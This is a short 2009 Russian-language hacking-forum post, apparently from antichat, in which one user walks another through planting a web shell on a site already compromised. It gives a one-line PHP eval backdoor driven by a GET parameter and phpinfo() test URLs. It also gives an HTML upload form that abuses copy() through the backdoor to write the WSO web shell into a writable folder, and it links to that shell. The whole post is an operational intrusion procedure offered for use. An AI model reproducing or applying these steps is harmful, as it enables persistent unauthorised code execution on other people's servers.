25.10.2009, 17:16
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от M1ks
да, можно... кмд шел даже залил
там стоит
magic_quotes_sybase = On
добавляются \ в кавычках, я писал выше
тогда лей wso без html-вставок, последняя версия:
https://forum.antichat.ru/threadedpost1624918.html#post1624918
1. Заливаешь такой шелл:
<?eval(stripslashes($_GET[e]));?>
2. Проверяешь:
Код:
http://site.com/имя_твоего_шелла&e=phpinfo();
или
Код:
http://site.com/имя_твоего_шелла?e=phpinfo();
по разному бывает
3. У себя на компе такую локальную форму творишь (обзываешь .html):
Код:
<form action=http://site.com/имя_твоего_шелла&e=copy($_FILES[file][tmp_name],$_GET[aa]);&aa=/www/тут_полный_абсолютный_путь_до_папки_с_правами_на_запись/shell.php
method=post enctype=multipart/form-data>
<input type=file name=file><br>
<input type=submit value=Загрузить><br>
</form>
4. Запускаешь и льешь wso, всё
Последний раз редактировалось Pashkela; 25.10.2009 в 17:19..
|
|
|